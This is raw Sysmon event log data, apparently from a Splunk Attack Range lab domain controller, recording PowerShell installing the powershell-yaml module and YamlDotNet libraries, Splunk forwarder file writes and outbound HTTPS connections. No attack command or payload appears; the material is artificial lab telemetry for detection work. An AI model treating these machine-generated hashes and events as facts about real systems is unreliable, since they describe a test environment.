21:08:12.622{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\netstandard1.3\LICENSE-libyamlMD5=6015F088759B10E0BC2BF64898D4AE17,SHA256=D0D8B09800A45CD982E9568FC7669D9C1A4C330E275A821BBE24D54366D16FE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024270Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.622{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\netstandard1.3\LICENSEMD5=25C40CB4C538F431332DE58473C0427A,SHA256=501450819EE316F35A214E7CEC1C19E14E5126392D356069D7AFEC7E59699536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024269Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.622{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net45\YamlDotNet.xmlMD5=1045C5CAD5567179C0C91E47C43689E5,SHA256=6C9A38C755046212D995C94D912F1CC27E35A44B0B555F813D4E4510387D2111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024268Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.606{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=294997E7F36605B73204B6A003DC5FB6,SHA256=C7476AAC337B2B47C461ADC8198095CCAADAE375E3F79351ECBA889EAA4D5162,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024267Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.606{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net45\YamlDotNet.dllMD5=DA2625600648BA915F0B84D077D9674C,SHA256=D6651327108E0FBD0CDC31FED001170044D23F31F5F26708E3EDC6C28B4A8C40,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000024266Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.606{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net45\LICENSE-libyamlMD5=6015F088759B10E0BC2BF64898D4AE17,SHA256=D0D8B09800A45CD982E9568FC7669D9C1A4C330E275A821BBE24D54366D16FE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024265Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.606{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net45\LICENSEMD5=25C40CB4C538F431332DE58473C0427A,SHA256=501450819EE316F35A214E7CEC1C19E14E5126392D356069D7AFEC7E59699536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024264Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.606{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net35\YamlDotNet.xmlMD5=1045C5CAD5567179C0C91E47C43689E5,SHA256=6C9A38C755046212D995C94D912F1CC27E35A44B0B555F813D4E4510387D2111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024263Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.591{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net35\YamlDotNet.dllMD5=533A81907AB3B514953EEDB33290A9C6,SHA256=17F96E364AF4A0450A7013C047F39D6B0DA9C41B6809EF6677A5E500BB87985A,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000024262Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.591{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net35\LICENSE-libyamlMD5=6015F088759B10E0BC2BF64898D4AE17,SHA256=D0D8B09800A45CD982E9568FC7669D9C1A4C330E275A821BBE24D54366D16FE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024261Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.591{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net35\LICENSEMD5=25C40CB4C538F431332DE58473C0427A,SHA256=501450819EE316F35A214E7CEC1C19E14E5126392D356069D7AFEC7E59699536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.575{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1.nupkgMD5=E6C0341FC9AEB84E1E36BFECABBEAD48,SHA256=47F21C151775C2F0D8A21C86CEDCA3998F0BBCFD309B27977C9024F48DA9787C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024259Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.544{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\powershell-yaml.nuspecMD5=AB1BDE82E3EA01840461F8CDECAF9ECE,SHA256=42ACB556A89758ABCD45DDEF1BE634BBA426CA10AA609AE4138B4A864841D24E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024258Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.528{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\Tests\powershell-yaml.Tests.ps12021-06-23 21:08:12.528 11241100x800000000000000024257Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:12.528{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\netstandard1.3\YamlDotNet.dll2021-06-23 21:08:12.528 11241100x800000000000000024256Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:12.528{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net45\YamlDotNet.dll2021-06-23 21:08:12.528 11241100x800000000000000024255Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:12.512{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net35\YamlDotNet.dll2021-06-23 21:08:12.512 11241100x800000000000000024254Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.512{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\Load-Assemblies.ps12021-06-23 21:08:12.512 23542300x800000000000000024253Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.497{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\package\services\metadata\core-properties\430f5a5dfccc46539418c7fe3ab7fdb5.psmdcpMD5=DC0292F774DABDDCBCDB307084C1332A,SHA256=C0F1A7DA750EACCACB94DAFE3365110F24FD1B860EAC139A9DA5C83B323C94FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.497{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\[Content_Types].xmlMD5=7C8D4574D5E9D74914A8AD0E4404FE3C,SHA256=6193BFA873134B31C4ED28AE5B3B724391D73617CB09B6D74C9CCAF3B380503B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024251Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.497{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\_rels\.relsMD5=63100F6CD3B03BD5E29EC81E0445C238,SHA256=807430E09941CFA610F0F771DEE3B34BE19BAC29878727F745D501B7765ACC7E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024250Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:12.481{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net45\YamlDotNet.dll2021-06-23 21:08:12.481 11241100x800000000000000024249Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:12.481{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\netstandard1.3\YamlDotNet.dll2021-06-23 21:08:12.481 11241100x800000000000000024248Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:12.466{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\net35\YamlDotNet.dll2021-06-23 21:08:12.466 11241100x800000000000000024247Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.466{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\Tests\powershell-yaml.Tests.ps12021-06-23 21:08:12.466 11241100x800000000000000024246Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.466{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\Load-Assemblies.ps12021-06-23 21:08:12.466 23542300x800000000000000024245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.278{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=655FA373C3B9A443BC2DA98D44775874,SHA256=8F159AF1E49936BA6341692CABE08B36C365435499D56574739A3A3CAD60C297,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.278{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC4E26C0180830172FC7B567401040F1,SHA256=8EBEDB13ECF0C410437620BFEE351486BDFCDBA78A7BBB83860816614EABFDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.216{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B69A03DA550CFBA41D4611945C92315,SHA256=07976E4D761867D581B32E4E5862D506A9D2140921E5D82D4D94DB4136892150,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024339Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.266{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61500-false72.21.81.200-443https 354300x800000000000000024338Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.255{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local57913- 354300x800000000000000024337Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.114{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61499-false10.0.1.12-8000- 354300x800000000000000024336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:11.767{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61498-false168.61.186.235-443https 354300x800000000000000024335Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:11.361{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61497-false168.61.186.235-443https 23542300x800000000000000024334Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.716{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A777541E62002E5B974188038AE3485B,SHA256=DAE235A0C8520FAC3F340664327322839131F36BBB68345AF36736E72170E1B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024333Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.356{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=837E8A6C0F9E1A3E9F181E22A5C914E9,SHA256=A15E19BB7107EF054C3678A94D6F84F655DC4B95E13602D5F46E15BE8D85841F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024332Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.341{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AA1E958CF5464A9F48F400A5E8DA7C5,SHA256=E1B84BD74ADF63BB0BCE74BAC609C04B3AF395C1D9DE1A5606C15D41FAE1C001,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024331Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.325{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=912B883CD0C45DAF1FC41E9FB4AC8C01,SHA256=303B1C3EC5F1955A7BE2720CEBB01E6D62C9F3177910B75F109BE728865B531F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024330Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.325{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0022FA0EFE1F9B7B92C27C4B6EC5BC0,SHA256=156ACB00D628BC9E4E479B626DFED44B03BBE921520F1B21A29629BFEB625339,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024329Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\README.mdMD5=2BE6396AEBA655CD9EDD9AAA5578F149,SHA256=DF954FA2D7BFA9E029FF717A7AADD5A121649B24255B2324C1AFA5D9FF6CA8FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024328Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\powershell-yaml.psm1MD5=5F146B18BB809E5D900403AB0066D3E3,SHA256=A7D42EDEA0BD36817C750C5EA6D550274A877094C3CF0C620DFE887F8D41AFEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024327Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\powershell-yaml.psd1MD5=9BFC87E3A2D4C1B72B26A975E89A0253,SHA256=D6F3DF338AB1A2701E456EA412A28A5981A53C490E19F1CE37FBA466812088DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024326Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\Load-Assemblies.ps1MD5=5BC56753AE039CB4E6DB7D2B573D8310,SHA256=2163CEA74A5F2D9023C3343CCCC3FAF0996B72850C7A8F2E0735F707B44EE3AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024325Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\LICENSEMD5=07FFE4BACD78A3E084BD25BAFB532A71,SHA256=F9B5ED99A83F2546D2696763210BAEEE4A8F476A9BE8E69F8C32D9BD9D9516C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024324Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\Tests\powershell-yaml.Tests.ps1MD5=83E9E0680C2DCA11951CE71B71C85B06,SHA256=5D615B9C64F422D66D98C8E54DF43CC08EB1603399EC71CF661F6FA08D0A18DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024323Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\netstandard1.3\YamlDotNet.xmlMD5=6FC1D7DCC2B91B4492FC2624927F2C0B,SHA256=E946653D61961FC79F3B970D7996B8F5A5566202148B8A5508B3608D602510E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024322Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\netstandard1.3\YamlDotNet.dllMD5=C6D295EC641BC776633AB4EDE6EEE871,SHA256=342E5362EE18BBCC1640B31F9F7040A1BDCF53C865E0976F99C4247C0F022B87,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000024321Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\netstandard1.3\LICENSE-libyamlMD5=6015F088759B10E0BC2BF64898D4AE17,SHA256=D0D8B09800A45CD982E9568FC7669D9C1A4C330E275A821BBE24D54366D16FE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024320Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\netstandard1.3\LICENSEMD5=25C40CB4C538F431332DE58473C0427A,SHA256=501450819EE316F35A214E7CEC1C19E14E5126392D356069D7AFEC7E59699536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024319Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.184{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net45\YamlDotNet.xmlMD5=1045C5CAD5567179C0C91E47C43689E5,SHA256=6C9A38C755046212D995C94D912F1CC27E35A44B0B555F813D4E4510387D2111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024318Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net45\YamlDotNet.dllMD5=DA2625600648BA915F0B84D077D9674C,SHA256=D6651327108E0FBD0CDC31FED001170044D23F31F5F26708E3EDC6C28B4A8C40,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000024317Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net45\LICENSE-libyamlMD5=6015F088759B10E0BC2BF64898D4AE17,SHA256=D0D8B09800A45CD982E9568FC7669D9C1A4C330E275A821BBE24D54366D16FE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024316Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net45\LICENSEMD5=25C40CB4C538F431332DE58473C0427A,SHA256=501450819EE316F35A214E7CEC1C19E14E5126392D356069D7AFEC7E59699536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024315Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net35\YamlDotNet.xmlMD5=1045C5CAD5567179C0C91E47C43689E5,SHA256=6C9A38C755046212D995C94D912F1CC27E35A44B0B555F813D4E4510387D2111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024314Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net35\YamlDotNet.dllMD5=533A81907AB3B514953EEDB33290A9C6,SHA256=17F96E364AF4A0450A7013C047F39D6B0DA9C41B6809EF6677A5E500BB87985A,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000024313Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net35\LICENSE-libyamlMD5=6015F088759B10E0BC2BF64898D4AE17,SHA256=D0D8B09800A45CD982E9568FC7669D9C1A4C330E275A821BBE24D54366D16FE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024312Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net35\LICENSEMD5=25C40CB4C538F431332DE58473C0427A,SHA256=501450819EE316F35A214E7CEC1C19E14E5126392D356069D7AFEC7E59699536,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024311Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.137{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\Load-Assemblies.ps12021-06-23 21:08:13.137 11241100x800000000000000024310Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 